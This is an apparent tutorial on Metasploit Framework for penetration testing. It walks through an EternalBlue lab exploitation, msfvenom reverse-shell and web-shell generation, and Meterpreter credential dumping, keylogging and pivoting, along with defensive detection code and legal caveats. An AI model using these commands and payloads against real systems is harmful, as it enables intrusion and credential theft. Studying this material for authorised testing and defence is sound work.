
Metasploit Framework — How to Use It for Penetration Testing

Reading time: approx. 18 min · 2026-05-09

Metasploit Framework is the open-source offensive framework that pentesters and red teamers worldwide use as a common language. From vulnerability validation to exploit execution, payload generation, and post-exploitation, the entire flow is driven from a single interface. This article is built around one goal: making you actually able to use the tool. Commands and hands-on practice are the focus.

01

What Metasploit is #

Metasploit Framework is an open-source offensive framework used for penetration testing and vulnerability validation. The core value is not "write an exploit from scratch every time" but the ability to invoke known exploits / payloads / post-modules from a unified interface.

Bundled by default in Kali Linux and Parrot OS, and a required practical skill in certifications like OSCP and CEH, it is the de facto "first offensive tool you ever touch".

▸ A one-line history

Started in 2003 by HD Moore in Perl → fully rewritten in Ruby in v3.0 (2007) → acquired by Rapid7 in 2009 and actively developed ever since.

What it can do #

  • Vulnerability scanning (auxiliary modules)
  • Exploitation of known CVEs (thousands of exploit modules)
  • Payload generation (msfvenom — exe / elf / php / shellcode and more)
  • Post-exploitation (info gathering, lateral movement, privilege escalation via Meterpreter)
  • Listener / handler (catching reverse connections)
02

Launch and database initialization #

On Kali it is preinstalled. Initialize the database once, on first use, and the result-management commands (hosts / services / vulns) become available from then on.

Launch sequence
```
$ sudo msfdb init      # start PostgreSQL + create DB (first time only)
$ msfconsole           # launch the interactive shell

       =[ metasploit v6.x.x-dev                          ]
+ -- --=[ 2300+ exploits - 1200+ auxiliary - 410+ post   ]
+ -- --=[ 950+ payloads - 45+ encoders - 11+ nops        ]

msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
```
▸ The first three commands to memorize

help for the built-in command list, search to find modules, and use to select one. These three already cover most of what you need.

03

The basic workflow (five steps) #

Just about every Metasploit-driven attack fits into the same five-step shape.

1. Reconnaissance
nmap to enumerate open ports and service versions. db_nmap stores results directly in the msf database.
2. Module search
Use search to find an exploit matching the CVE or service.
3. Select + configure
use the module → show options → set RHOSTS / LHOST / PAYLOAD.
4. Execute
check first to confirm the vulnerability is present, then exploit. Session acquired.
5. Post-exploitation
Use Meterpreter for info gathering, lateral movement, privilege escalation, and persistence.
04

The module hierarchy #

Every capability is packaged as a "module". They live in a tree under /usr/share/metasploit-framework/modules/.

| Type | Role | Representative example |
|---|---|---|
| exploit | Abuse a vulnerability to gain code execution | exploit/windows/smb/ms17_010_eternalblue |
| auxiliary | Helpers: scanning, brute force, listeners | auxiliary/scanner/portscan/tcp |
| payload | Code that runs on the target after a successful exploit | windows/x64/meterpreter/reverse_tcp |
| post | Post-exploitation automation (recon / lateral / persistence) | post/multi/recon/local_exploit_suggester |
| encoder | Transform shellcode to evade static signatures | x86/shikata_ga_nai |
| evasion | Generate executables with AV-evasion built in | windows/windows_defender_exe |

The three payload structures #

  • single (inline) — one self-contained binary. Big, but stable.
  • stager — a tiny stub that downloads the real payload over the network. Useful when the exploit has tight buffer constraints.
  • stage — the real payload that the stager loads. Meterpreter works through this mechanism.
05

Essential msfconsole commands #

The minimum set worth committing to memory. These cover roughly 95% of day-to-day usage.

Search / select / configure / execute
```
# search
msf6 > search ms17_010
msf6 > search type:exploit platform:windows

# module selection (the index from search results also works)
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > use 0
msf6 > back                        # go back one level

# inspect
msf6 > info
msf6 > show options
msf6 > show payloads
msf6 > show targets

# parameter setting
msf6 > set RHOSTS 192.168.56.50
msf6 > set LHOST eth0              # interface name is accepted
msf6 > setg LHOST 10.0.2.4         # global setting (applies to all modules)

# execute
msf6 > check                       # pre-flight the vulnerability
msf6 > exploit
msf6 > exploit -j -z               # run in background
msf6 > run                         # synonym for exploit
```
Session and job management
```
msf6 > sessions -l                 # list
msf6 > sessions -i 1               # attach to ID=1
meterpreter > background           # Ctrl+Z also works, returns to console
msf6 > sessions -K                 # kill all sessions
msf6 > jobs -l
msf6 > jobs -K
```
Database integration (requires msfdb init)
```
msf6 > workspace -a redteam        # create a workspace
msf6 > db_nmap -sS 192.168.56.0/24
msf6 > hosts                       # discovered hosts
msf6 > services                    # discovered services
msf6 > vulns                       # candidate vulnerabilities
msf6 > loot                        # collected files
```
06

Hands-on — EternalBlue (MS17-010) #

The SMB v1 vulnerability used by the 2017 WannaCry ransomware. Unpatched Windows 7 and Server 2008 R2 boxes are sitting ducks, making this a classic exercise — featured in HackTheBox Blue and the OSCP labs.

STEP 1 — Reconnaissance #

SMB detection with nmap
```
$ nmap -p 445 --script smb-vuln-ms17-010 192.168.56.50

PORT    STATE SERVICE
445/tcp open  microsoft-ds
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
```

STEP 2 — Module search #

search inside msfconsole
```
msf6 > search ms17_010

Matching Modules

   #  Name
   0  exploit/windows/smb/ms17_010_eternalblue
   1  exploit/windows/smb/ms17_010_psexec
   2  auxiliary/scanner/smb/smb_ms17_010
```

STEP 3 — Configure + check #

Set parameters and pre-flight
```
msf6 > use 0
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.56.50
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.56.106
msf6 exploit(ms17_010_eternalblue) > check
[+] 192.168.56.50:445 - Host is likely VULNERABLE to MS17-010!
```

STEP 4 — Execute #

exploit → Meterpreter session
```
msf6 exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.56.106:4444
[*] 192.168.56.50:445 - ...exploitation successful...
[*] Sending stage (200774 bytes) to 192.168.56.50
[*] Meterpreter session 1 opened

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM     # SYSTEM in one shot
meterpreter > sysinfo
Computer    : DC01
OS          : Windows 7 (6.1 Build 7601, SP1)
Architecture: x64
```
▸ Why EternalBlue hands you SYSTEM right away

The SMB service runs in the kernel (srv.sys). Since the exploit targets a vulnerability in the SMB driver itself, the shellcode runs with SYSTEM privileges from the very first instruction. Unlike userland exploits, there is no follow-up privilege-escalation step needed.

07

Payload generation with msfvenom #

A standalone payload-generation tool. Use it when you want to produce an exe / elf / php / shellcode locally and deliver it through another channel — file upload, email attachment, USB, and so on.

Key options #

  • -p <payload> — payload name
  • LHOST= / LPORT= — reverse-connection destination (use =, not set)
  • -f <format> — output format (exe / elf / raw / php / c, etc.)
  • -e <encoder> / -i <count> — encoder + number of iterations
  • -b '\x00\x0a\x0d' — exclude bad chars
  • -o <file> — output destination

Common combinations #

msfvenom samples
```
# Windows Meterpreter exe
$ msfvenom -p windows/x64/meterpreter/reverse_tcp \
    LHOST=192.168.56.106 LPORT=4444 \
    -f exe -o shell.exe

# Linux ELF
$ msfvenom -p linux/x64/meterpreter/reverse_tcp \
    LHOST=192.168.56.106 LPORT=4444 \
    -f elf -o shell.elf

# PHP web shell
$ msfvenom -p php/meterpreter/reverse_tcp \
    LHOST=192.168.56.106 LPORT=4444 \
    -f raw -o shell.php

# C shellcode (for BoF experiments, with bad chars excluded)
$ msfvenom -p linux/x86/shell_reverse_tcp \
    LHOST=192.168.56.106 LPORT=4444 \
    -b '\x00\x0a\x0d' -f c
```

The receiver side — multi/handler #

To catch the reverse connection from a generated payload, stand up multi/handler.

Start the handler
```
msf6 > use exploit/multi/handler
msf6 exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(handler) > set LHOST 192.168.56.106
msf6 exploit(handler) > set LPORT 4444
msf6 exploit(handler) > exploit -j        # listen in background
```
▸ Encoders do not get you past AV

Encoders like shikata_ga_nai only defeat static signatures. Modern EDR catches binaries via behavioral analysis, sandboxing, and memory scanning, so anything msfvenom generates directly should be treated as "will be detected immediately".
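The stager-then-stage exchange described in this section (and in the payload-structure list of section 04) leaves a recognisable network footprint: the stager connects out, sends almost nothing, and the handler immediately pushes a stage of a few hundred KB back. The following Python is an added example written for this article, not Metasploit code; it applies that heuristic to constructed Zeek-style conn.log records, assuming the default LPORT 4444 and the roughly 200 KB stage size shown in the EternalBlue walkthrough.

```python
from typing import Dict, List

WEB_PORTS = {80, 443, 8443}
DEFAULT_HANDLER_PORTS = {4444}   # msfvenom / multi/handler default LPORT
STAGE_MIN_BYTES = 100_000        # the Meterpreter stage on this page is ~200 KB
MAX_CLIENT_BYTES = 1_000         # a stager sends almost nothing before the stage lands

# Zeek conn.log-style columns (header-less, tab-separated); assumed layout.
FIELDS = ["ts", "uid", "orig_h", "orig_p", "resp_h", "resp_p",
          "proto", "service", "orig_bytes", "resp_bytes"]

# Constructed sample records: a stager pull on 4444, a normal TLS download,
# file-server SMB traffic, and a stager pull on a non-default port.
SAMPLE_CONN_LOG = """\
1715000001.10\tCabc1\t10.0.0.12\t49712\t192.168.56.106\t4444\ttcp\t-\t0\t200774
1715000002.30\tCabc2\t10.0.0.12\t49713\t93.184.216.34\t443\ttcp\tssl\t2400\t480000
1715000003.00\tCabc3\t10.0.0.20\t49001\t10.0.0.5\t445\ttcp\tsmb\t12000\t9000
1715000004.80\tCabc4\t10.0.0.12\t49720\t203.0.113.7\t8080\ttcp\t-\t120\t310000
"""

def parse_conn_log(text: str) -> List[Dict[str, str]]:
    """Turn TSV lines into dicts keyed by FIELDS; skips blanks and # comments."""
    return [dict(zip(FIELDS, line.split("\t")))
            for line in text.splitlines() if line and not line.startswith("#")]

def stager_reasons(rec: Dict[str, str]) -> List[str]:
    """Why a record resembles a stager pulling its stage (empty list if it doesn't)."""
    port, client_b, server_b = (int(rec[k]) for k in ("resp_p", "orig_bytes", "resp_bytes"))
    reasons = []
    if port in DEFAULT_HANDLER_PORTS:
        reasons.append("default handler port %d" % port)
    # Core pattern: tiny client side, stage-sized reply, on a non-web port.
    # A long-lived session accumulates client bytes, so in production apply
    # this to the first seconds of the connection rather than the final totals.
    if client_b <= MAX_CLIENT_BYTES and server_b >= STAGE_MIN_BYTES and port not in WEB_PORTS:
        reasons.append("%d B pushed to client after only %d B sent on tcp/%d" % (server_b, client_b, port))
    return reasons

def find_stager_flows(text: str) -> List[Dict[str, object]]:
    """Alerts for every record carrying at least one stager indicator."""
    alerts = []
    for rec in parse_conn_log(text):
        reasons = stager_reasons(rec)
        if reasons:
            alerts.append({"uid": rec["uid"], "src": rec["orig_h"],
                           "dst": "%s:%s" % (rec["resp_h"], rec["resp_p"]), "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for alert in find_stager_flows(SAMPLE_CONN_LOG):
        print(alert)
```

Only the two stager-like records are reported; the TLS download is excused by its port and the SMB session by its balanced byte counts.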

08

Meterpreter #

Meterpreter is Metasploit's signature payload. It is memory-resident, uses encrypted communications, runs cross-platform, and supports dynamic module loading. Because it never drops a binary on disk it is harder for AV to see, and feature-wise it is in a different league from a raw reverse shell.

Frequently used commands #

Info gathering and privilege escalation
```
meterpreter > sysinfo          # OS / architecture
meterpreter > getuid           # current user
meterpreter > ps               # process list

# Windows privilege escalation
meterpreter > getsystem        # attempt elevation to SYSTEM
meterpreter > hashdump         # dump SAM hashes (requires SYSTEM)
meterpreter > load kiwi        # load mimikatz functionality
meterpreter > kiwi_cmd "sekurlsa::logonpasswords"
```
Files / processes / input monitoring
```
meterpreter > download /etc/shadow
meterpreter > upload payload.exe C:\\Windows\\Temp\\
meterpreter > migrate 1234     # jump to another process (evasion / privilege change)
meterpreter > screenshot       # capture the screen
meterpreter > keyscan_start    # start keylogger
meterpreter > keyscan_dump
meterpreter > shell            # spawn a native cmd / sh
```

Pivoting — into the internal network #

Using a compromised host as a stepping stone, you can route scans and exploits into internal IP segments that would otherwise be unreachable.

Add a route with autoroute
```
meterpreter > run autoroute -s 10.0.0.0/24
meterpreter > background       # return to the console, session stays alive
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(tcp) > set RHOSTS 10.0.0.5
msf6 auxiliary(tcp) > run      # scan 10.0.0.5 through the compromised host
```
09

The defender's perspective and ethics #

Metasploit is an offensive tool, but it is equally a validation tool for "does this actually work against my environment?". Required reading for blue teams too.

What the defender should do #

  • Don't sit on known CVEs — most Metasploit exploits target known CVEs, and patching kills most of them.
  • Keep EDR current — Meterpreter's reflective DLL injection is detectable by modern EDR.
  • Disable SMBv1 / LLMNR / NetBIOS — these are the breeding ground for EternalBlue and Responder-style attacks.
  • LAPS / JIT administration — block lateral movement that relies on reused passwords.
  • Centralize logs in SIEM — detect anomalous PowerShell, new processes, and unusual SMB access.
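For the SIEM item above, this is what the Meterpreter commands from section 08 (migrate, hashdump / kiwi, shell) look like to a host sensor. Added example, not Metasploit or Sysmon code; it runs over constructed Sysmon-style events (ID 1 ProcessCreate, 8 CreateRemoteThread, 10 ProcessAccess), and the allowlists are assumed, site-specific placeholders.

```python
from typing import Dict, List, Tuple

LSASS = "lsass.exe"
SHELLS = {"cmd.exe", "powershell.exe"}
# Allowlists are assumed placeholders; tune them from your own baseline.
SHELL_PARENTS_OK = {"explorer.exe", "cmd.exe", "powershell.exe", "code.exe"}
INJECT_SOURCES_OK = {"csrss.exe", "msmpeng.exe"}
PROCESS_VM_READ = 0x0010   # access bit required to read LSASS memory (hashdump / kiwi)

# Constructed Sysmon-style events: 1 = ProcessCreate, 8 = CreateRemoteThread, 10 = ProcessAccess.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\Temp\shell.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 8, "SourceImage": r"C:\Windows\Temp\shell.exe",          # migrate
     "TargetImage": r"C:\Windows\System32\svchost.exe"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",   # hashdump / kiwi
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",              # shell
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",     # benign query, no VM_READ
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
]

def base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def analyze(events: List[Dict]) -> List[Tuple[str, str]]:
    """Return (rule, detail) alerts. A process that was injected into is 'tainted',
    which raises the severity of whatever it does next (the migrate -> hashdump chain)."""
    alerts, tainted = [], set()
    for e in events:
        eid = e["EventID"]
        if eid == 8:
            src, dst = base(e["SourceImage"]), base(e["TargetImage"])
            if src not in INJECT_SOURCES_OK:
                tainted.add(dst)
                alerts.append(("migrate-like remote thread", f"{src} -> {dst}"))
        elif eid == 10 and base(e["TargetImage"]) == LSASS:
            src = base(e["SourceImage"])
            if int(e["GrantedAccess"], 16) & PROCESS_VM_READ and src not in INJECT_SOURCES_OK:
                sev = "high" if src in tainted else "medium"
                alerts.append((f"lsass memory read ({sev})", src))
        elif eid == 1 and base(e["Image"]) in SHELLS:
            parent = base(e["ParentImage"])
            if parent in tainted or parent not in SHELL_PARENTS_OK:
                alerts.append(("shell from unexpected parent", f"{parent} -> {base(e['Image'])}"))
    return alerts
```

Running analyze(SAMPLE_EVENTS) yields three alerts in order: the injection, the high-severity LSASS read from the injected-into process, and the cmd.exe spawned under it.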
▸ Legal and ethical considerations

Running Metasploit against systems you don't own, without permission, is a crime. In Japan this falls under the Unauthorized Computer Access Act and the Penal Code (obstruction of business by damaging electronic computers).

Use is limited to:

  • Environments you own (home LAN / self-built VMs / HackTheBox / VulnHub)
  • Penetration tests with written authorization (a signed contract with the client)
  • CTFs (only where the organizer has explicitly authorized attacks)

"I just want to try a PoC", "on my friend's server", "on a coworker's PC" — all unacceptable.

Summary #

  • Metasploit moves in five steps: discover → select → configure → execute → post
  • The main UI is msfconsole, standalone payloads come from msfvenom, results are managed by msfdb
  • Meterpreter is a memory-resident stealth shell; migrate / hashdump / autoroute are the post-exploitation workhorses
  • In the EDR era, assume raw msfvenom output gets detected; serious evasion is the domain of other frameworks (Sliver, Cobalt Strike, etc.)
  • Use it only on authorized environments — if you can't honor that rule, don't touch it